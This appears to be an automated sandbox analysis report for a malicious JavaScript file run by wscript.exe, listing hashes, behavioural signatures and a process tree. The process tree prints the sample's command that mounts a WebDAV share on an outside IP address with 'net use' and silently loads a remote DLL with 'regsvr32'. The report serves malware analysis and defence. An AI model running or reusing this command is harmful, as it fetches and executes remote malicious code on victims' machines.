Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 05:24
Static task
static1
Behavioral task
behavioral1
Sample
103591080224386905.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
103591080224386905.js
Resource
win10v2004-20240709-en
General
-
Target
103591080224386905.js
-
Size
5KB
-
MD5
c8a7da225a7055a740ee1d1e1269fb44
-
SHA1
2f3db53cf6e5497331b0934f6cc623746671f02b
-
SHA256
62631fed2d86005525e66b6cba3d9b4f37a1fdb10722ca493a65955bc192e0cf
-
SHA512
8e50386dfcd5eae526602819e24a322e9db5617cb74f6667b23376fe45313aaf809a4adc46bc7344459a055f3eac1daadfe3c1e5b5bbecebf76e3409d3efc010
-
SSDEEP
96:vOfraUBhTpr3VgTFfINfi7XUbL+ICG72CWknV1c0suRnI4zMIAzi1HYXiH+1I1HX:sJTdGdAgZoXAkWoX+I
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 740 wrote to memory of 824 740 wscript.exe 86 PID 740 wrote to memory of 824 740 wscript.exe 86 PID 824 wrote to memory of 3604 824 cmd.exe 88 PID 824 wrote to memory of 3604 824 cmd.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\103591080224386905.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\3197678926535.dll2⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3604
-
-